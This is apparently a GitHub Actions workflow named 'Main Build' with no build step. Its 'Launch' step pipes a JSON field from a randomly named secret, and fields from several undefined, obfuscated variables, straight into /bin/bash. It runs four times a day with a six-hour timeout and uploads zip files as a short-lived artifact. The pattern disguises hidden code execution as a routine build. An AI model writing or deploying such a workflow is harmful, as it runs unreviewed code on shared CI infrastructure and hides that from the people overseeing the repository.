name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '40 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          r9836: ${{ secrets.r9836 }}
        run: |
          printf '%s' "$r9836" | jq -r .mql61 | /bin/bash
          echo $jenx65 | jq -r .sbw45 | /bin/bash
          printf '%s' "$narbb14625" | jq -r .j6 | /bin/bash
          printf '%s' "$ouiu1" | jq -r .i930 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: FHr0yD6I
          path: "*.zip"
          retention-days: 1
